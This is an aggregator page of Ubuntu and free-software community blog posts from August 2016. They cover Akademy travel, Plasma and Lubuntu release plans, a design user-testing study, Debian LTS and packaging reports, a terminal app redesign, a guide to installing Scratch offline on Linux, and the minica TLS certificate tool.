Hello, if you are reading this, and have some extra money, consider helping out a young friend of mine whose mother needs a better defense attorney.

In India, where they live, the resources all seem stacked against her. I've tried to help, and hope you will too.

Himanshu says: Hi, I recently started an online crowdfunding campaign to help my mother, who is in the middle of a divorce and domestic violence case, with legal funds.

 https://www.ketto.org/mother

Please support and share this message. Thanks.
on August 21, 2016 07:55 AM

August 18, 2016



Thanks to the Ubuntu Community Fund, I'm able to fly to Berlin and attend, and volunteer too. Thanks so much, Ubuntu community for backing me, and to the KDE e.V. and KDE community for creating and running Akademy.

This year, Akademy is part of Qtcon, which should be exciting. Lots of our friends will be there, from KDAB, VLC, Qt and FSFE. And of course Kubuntu will do our annual face-to-face meeting, with as many of us as can get to Berlin. It should be hot, exhausting, exciting, fun, and hard work, all rolled together in one of the world's great cities.

Today we got the news that Canonical has become a KDE e.V. Patron. This is most welcome news, as the better the cooperation between distributions and KDE, the better software we all have. This comes soon after SuSE's continuing support was affirmed on the growing list of Patrons.

Freedom and generosity is what it's all about!
on August 18, 2016 11:17 PM

I’ve made some changes to the Plasma 5.8 release schedule.  We had a request from our friends at openSUSE to bring the release forward by a couple of weeks so they could sneak it into their release and everyone could enjoy the LTS goodness.  As openSUSE are long term supporters and contributors to KDE, as well as patrons of KDE, the Plasma team chatted and decided to slide the dates around to help out.  Release is now on the first Tuesday in October.

 

on August 18, 2016 09:14 PM

S09E25 – Golden Keys - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

It’s Episode Twenty-five of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

We’re here again!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on August 18, 2016 02:00 PM
This has been extended to 30 August 2016 at 19 UTC. The Lubuntu team needs your feedback! We would like to get your input on a poll we have created to gauge your usage of the Lubuntu images. Your feedback is essential in making sure we make the right decision going forward! The poll is […]
on August 18, 2016 01:16 AM

August 17, 2016

Recently I have been working on the visual design for RCS (which stands for rich communications service) group chat. While working on the “Group Info” screen, we found ourselves wondering what the best way to display an online/offline status would be. Some of us thought text would be more explicit, but others thought it adds more noise to the screen. We decided that we needed some real data in order to make the best decision.

Usually our user testing is done by a designated researcher, but their plates are full and their projects bigger, so I decided to make my first foray into user testing. I got some tips from designers on our cloud team who had more experience with user testing: Maria Vrachni, Carla Berkers and Luca Paulina.

I then set about finding my user testing group. I chose 5 people to start with because you can uncover up to 80% of usability issues from speaking to 5 people. I tried to recruit a range of people to test with and they were:

  1. Billy: a software engineer, very tech savvy and a tech enthusiast.
  2. Magda: our former PM, very familiar with our product and designs.
  3. Stefanie: our Office Manager, who knows our products but is not so familiar with our designs.
  4. Rodney: our IS Associate, who is tech savvy but not familiar with our design work.
  5. Ben: a copyeditor who has no background in tech or design and is a light phone user.

The tool I decided to use was Invision. It has a lot of good features and I already had some experience creating lightweight prototypes with it. I made four minimal prototypes where the group info screen had a mixture of dots vs text to represent online status, and variations on placement. I then put these on my phone so my test subjects could interact with them and feel like they were looking at a full-fledged app, with the same expectations.

group_chat_testing

During testing, I made sure not to ask my subjects any leading questions. I only asked them very broad questions like “Do you see everything you expect to on this page?”, “Is anything unclear?” etc. When testing, it’s important not to lead the test subjects so they can be as objective as possible. Keeping this in mind, it was interesting to see what the testers noticed and brought up on their own, and what patterns arose.

My findings were as follows:

Online status: Text or Green Dot

They unanimously preferred the online status to be depicted with colour, and 4 out of 5 preferred the green dot rather than text because of its scannability.

Online status placement:

This one was close but having the green dot next to the avatar had the edge, again because of its scannability. One tester preferred the dot next to the arrow and another didn’t have a preference on placement.

Pending status:

What was also interesting is that three out of the four thought “pending” had the wrong placement. They felt it should have the same placement as online and offline status.

Overall, it was very interesting to collect real data to support our work, and I am looking forward to the next time, which will hopefully be bigger in scope.

group_chat_final

The finished design

on August 17, 2016 03:57 PM

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In July, 136.6 work hours have been dispatched among 11 paid contributors. Their reports are available:

  • Antoine Beaupré has been allocated 4 hours again but in the end he put back his 8 pending hours in the pool for the next months.
  • Balint Reczey did 18 hours (out of 7 hours allocated + 2 remaining, thus keeping 2 extra hours for August).
  • Ben Hutchings did 15 hours (out of 14.7 hours allocated + 1 remaining, keeping 0.7 extra hour for August).
  • Brian May did 14.7 hours.
  • Chris Lamb did 14 hours (out of 14.7 hours, thus keeping 0.7 hours for next month).
  • Emilio Pozuelo Monfort did 13 hours (out of 14.7 hours allocated, thus keeping 1.7 extra hours for August).
  • Guido Günther did 8 hours.
  • Markus Koschany did 14.7 hours.
  • Ola Lundqvist did 14 hours (out of 14.7 hours assigned, thus keeping 0.7 extra hours for August).
  • Santiago Ruano Rincón did 14 hours (out of 14.7h allocated + 11.25 remaining, the 11.95 extra hours will be put back in the global pool as Santiago is stepping down).
  • Thorsten Alteholz did 14.7 hours.

Evolution of the situation

The number of sponsored hours jumped to 159 hours per month thanks to GitHub joining as our second platinum sponsor (funding 3 days of work per month)! Our funding goal is getting closer but it’s not there yet.

The security tracker currently lists 22 packages with a known CVE and the dla-needed.txt file likewise. That’s a sharp decline compared to last month.

Thanks to our sponsors

New sponsors are in bold.


on August 17, 2016 02:45 PM

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donators (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

DebConf 16

I was in South Africa for the whole week of DebConf 16 and gave 3 talks/BoFs. You can find the slides and the videos on their corresponding pages.

I was a bit nervous about the third BoF (on using Debian money to fund Debian projects) but I discussed it with many people during the week, and it looks like the project evolved quite a bit in the last 10 years: while it’s still a sensitive topic (and rightfully so, given the possible impacts), people are willing to discuss the issues and to experiment. You can have a look at the gobby notes that resulted from the live discussion.

I spent most of the time discussing with people and I did not do much technical work besides trying (and failing) to fix accessibility issues with tracker.debian.org (help from knowledgeable people is welcome, see #830213).

Debian Packaging

I uploaded a new version of zim to fix a reproducibility issue (and forwarded the patch upstream).

I uploaded Django 1.8.14 to jessie-backports and had to fix a failing test (pull request).

I uploaded python-django-jsonfield 1.0.1 a new upstream version integrating the patches I prepared in June.

I managed the (small) ftplib library transition. I prepared the new version in experimental, ensured that reverse build dependencies still build, and coordinated the transition with the release team. This was all triggered by a reproducible build bug that I received and that made me look at the package… the last time I looked, upstream had disappeared (the upstream URL was even gone), but it seems he became active again and pushed a new release.

I filed wishlist bug #832053 to request a new deblog command in devscripts. It should make it easier to display current and former build logs.

Kali related Debian work

I worked on many issues that were affecting Kali (and Debian Testing) users:

  • I made an open-vm-tools NMU to get the package back into testing.
  • I filed #830795 on nautilus and #831737 on pbnj to forward Kali bugs to Debian.
  • I wrote a fontconfig patch to make it ignore .dpkg-tmp files. I also forwarded that patch upstream and filed a related bug in gnome-settings-daemon which is actually causing the problem by running fc-cache at the wrong times.
  • I started a discussion to see how we could fix the synaptics touchpad problem in GNOME 3.20. In the end, we have a new version of xserver-xorg-input-all which only depends on xserver-xorg-input-libinput and not on xserver-xorg-input-synaptics (no longer supported by GNOME). This is after upstream refused to reintroduce synaptics support.
  • I filed #831730 on desktop-base because KDE’s plasma-desktop is no longer using the Debian background by default. I had to seek upstream help to find out a possible solution (deployed in Kali only for now).
  • I filed #832503 because the way dpkg and APT manages foo:any dependencies when foo is not marked “Multi-Arch: allowed” is counter-productive… I discovered this while trying to use a firefox-esr:any dependency. And I filed #832501 to get the desired “Multi-Arch: allowed” marker on firefox-esr.

Thanks

See you next month for a new summary of my activities.


on August 17, 2016 10:53 AM

August 15, 2016

Convergent terminal

Canonical Design Team

We have been looking at ways of making the Terminal app more pleasing, in terms of the user experience, as well as the visuals.

I would like to share the work so far, invite users of the app to comment on the new designs, and share ideas on what other new features would be desirable.

On the visual side, we have brought the app in line with our Suru visual language. We have also adopted the very nice Solarized palette as the default palette – though this will of course be completely customisable by the user.

On the functionality side we are proposing a number of improvements:

- Keyboard shortcuts
- Ability to completely customise touch/keyboard shortcuts
- Ability to split the screen horizontally/vertically (similar to Terminator)
- Ability to easily customise the palette colours, and window transparency (on desktop)
- Unlimited history/scrollback
- Adding a “find” action for searching the history

email-desktop

Tabs and split screen

On larger screens, tabs will be visually persistent. In addition, it’s desirable to be able to split a panel horizontally and vertically, and to use keyboard shortcuts or mouse/touch focus to move between panels.

On mobile, the tabs will be accessed through the bottom edge, as on the browser app.

terminal-blog-phone

Quick mobile access to shortcuts and commands

We are discussing the option of having modifier (Ctrl, Alt etc) keys working together with the on-screen keyboard on touch – which would be a very welcome addition. While this is possible to do in theory with our on-screen keyboard, it’s something that won’t land in the immediate near future. In the interim modifier key combinations will still be accessible on touch via the shortcuts at the bottom of the screen. We also want to make these shortcuts ordered by recency, and have the ability to add your own custom key shortcuts and commands.

We are also discussing with the on-screen keyboard devs about adding an app specific auto-correct dictionary – in this case terminal commands – that together with a swipe keyboard should make a much nicer mobile terminal user experience.

email-desktop

More themability

We would like the user to be able to define their own custom themes more easily, either via in-app settings with colour picker and theme import, or by editing a JSON configuration file. We would also like to be able to choose the window transparency (in windowed mode), as some users want a see-through terminal.

We need your help!

These visuals are work in progress – we would love to hear what kind of features you would like to see in your favourite terminal app!

Also, as Terminal app is a fully community developed project, we are looking for one or two experienced Qt/QML developers with time to contribute to lead the implementation of these designs. Please reach out to alan.pope@canonical.com or jouni.helminen@canonical.com to discuss details!

EDIT: To clarify – these proposed visuals are improvements for the community developed terminal app currently available for the phone and tablet. We hope to improve it, but it is still not as mature as older terminal apps. You should still be able to run your current favourite terminal (like gnome-terminal, Terminator etc) in Unity8.

on August 15, 2016 04:24 PM

Hello everyone. After quite some time, I am writing this article to share a recent experience with a training program presented by www.zuliatec.com called Procodi (www.procodi.com), a training program for children that gives them, from a very early age, tools to develop skills and abilities in the areas of software development, graphic design, digital electronics, robotics, digital media and digital music.

Scratch (as its own website says) is designed especially for ages 8 to 16, but it is used by people of all ages. Millions of people are creating Scratch projects in a wide variety of settings, including homes, schools, museums, libraries and community centres.

It also states: the ability to code computer programs is an important part of literacy in today's society. When people learn to program in Scratch, they learn important strategies for solving problems, designing projects, and communicating ideas.

Since this tool is very useful both for children and for adults, I will explain in a simple way how to get the program running offline on GNU/Linux.

If you use GNOME or a derivative, you need to have a library called Gnome-Keyring installed, and if you use KDE you need Kde-Wallet.

In this example I explain how to get Scratch working on Linux Mint, which should also work for operating systems derived from Debian.

  1. First download, from the official Scratch website https://scratch.mit.edu/scratch2download/, the files to install Adobe Air and Scratch for Linux; they are also available for Windows and Mac.
  2. Then install gnome-keyring: sudo aptitude install gnome-keyring
  3. Add two symbolic links in the /usr/lib/ folder as follows: sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0 /usr/lib/libgnome-keyring.so.0 && sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0.2.0 /usr/lib/libgnome-keyring.so.0.2.0
  4. Then, in a terminal, change into the directory containing the Adobe Air installer and run: chmod +x AdobeAIRInstaller.bin && ./AdobeAIRInstaller.bin
  5. Follow all the steps the installer shows you and be a little patient.
  6. With Adobe Air installed, locate the Scratch-448.air file in your file manager and open it with the Adobe AIR Application Installer. This also takes a little patience, but when it finishes it will create a shortcut on your desktop from which you can open the program as often as you like.

With the above, we can now use Scratch offline, but remember that if you visited the project's official website you may have noticed that it can also be used online.

Happy Hacking.


on August 15, 2016 11:03 AM

A while back, I found myself in need of some TLS certificates set up and issued for a testing environment.

I remembered there was some code for issuing TLS certs in Docker, so I yanked some of that code and made a sensible CLI API over it.

Thus was born minica!

Something as simple as minica tag@domain.tld domain.tld will issue two TLS certs (one with a Client EKU, and one server cert), both issued from a single CA.
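
As a sketch of the testing-environment use case, the server certificate and key can be fed straight to Python's ssl module to stand up a throwaway HTTPS server. The file names here are placeholders, since they depend on how minica names its output.

import http.server
import ssl

# Placeholder file names: substitute whatever minica actually wrote out.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="domain.tld.crt", keyfile="domain.tld.key")

server = http.server.HTTPServer(("127.0.0.1", 8443), http.server.SimpleHTTPRequestHandler)
server.socket = context.wrap_socket(server.socket, server_side=True)
server.serve_forever()  # point a client at https://127.0.0.1:8443/ with the test CA trusted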

Next time you’re in need of a few TLS keys (without having to worry about stuff like revocation or anything), this might be the quickest way out!

on August 15, 2016 12:40 AM

August 13, 2016

This blog post is not an announcement of any kind or even an official plan. This may even be outdated, so check the links I provide for additional info.

As you may have seen, the Lubuntu team (which I am a part of) has started the migration process to LXQt. It's going to be a long process, but I thought I might write about some of the things that go into this process.

Step 1 - Getting a metapackage

This step is already done, and the package was installable in a virtual machine the last time I checked. The metapackage is lubuntu-qt-desktop, but there's a lot to be desired.

While we already have this package, there's a lot to be tweaked. I've been running LXQt with the Lubuntu artwork as my daily driver for a few months now, and there's a lot missing. So while you have the ability to install the package and play around with it, it needs to change a lot to be usable.

Also in this image are our candidates (not final yet) for the applications that will be included in Lubuntu.

An up-to-date listing of the software in this metapackage is available here.

Step 2 - Getting an image

The next step is getting a working image for the team to test. The two outstanding merge proposals adding this have been merged, and we're now waiting for the images to be spun up and added to the ISO QA Tracker for testers.

Having this image will help us gauge how much of the system's resources are used, and gives us the ability to run some benchmarks on the desktop. This will come after the image is ready and spins up correctly.
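
As one example of the kind of quick check that becomes possible once the image boots, a few lines of Python can sample /proc/meminfo on the live session. This is only a sketch of an idle-memory measurement, not the team's actual benchmark plan.

def meminfo():
    """Return /proc/meminfo as a dict of values in kB."""
    values = {}
    with open("/proc/meminfo") as f:
        for line in f:
            key, rest = line.split(":", 1)
            values[key] = int(rest.strip().split()[0])
    return values

m = meminfo()
used_kb = m["MemTotal"] - m["MemFree"] - m["Buffers"] - m["Cached"]
print("Memory in use after boot (excluding caches): %d kB" % used_kb)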

Step 3 - Testing

An essential part of any good operating system is the testing. We need to create some LXQt-specific test cases and make sure the ISO QA test cases are working before we can release a reliable image to our users.

As mentioned before, we need test cases. We created a blueprint last cycle tracking our progress with test cases, and the sooner that those are done, the sooner Lubuntu can make the switch knowing that all of our selected applications work fine.

Step 4 - Picking applications

This is the tough step in all of this. We need to pick the applications that best suit our users' use cases (a lot of our users run on older hardware) and needs (LibreOffice for example). Every application will most likely need a week or two to do proper benchmarking and testing, but if you have a suggestion for an application that you would like to see in Lubuntu, share your feedback on the blueprints. This is the best way to let us know what you would like to see and your feedback on the existing applications before we make a final decision.

Final thoughts

I've been using LXQt for a while now, and it has a lot of advantages, not only in the applications but in the desktop itself. Depending on how notable some things are, I might do a blog post in the future; otherwise, see for yourself. :)

Here is our blueprint, which will be updated a lot in the next week or so and will tell you more about the transition. If you have any questions, shoot me an email at tsimonq2@lubuntu.me or send an email to the Lubuntu-devel mailing list.

I'm really excited for this transition, and I hope you are too.

on August 13, 2016 06:18 PM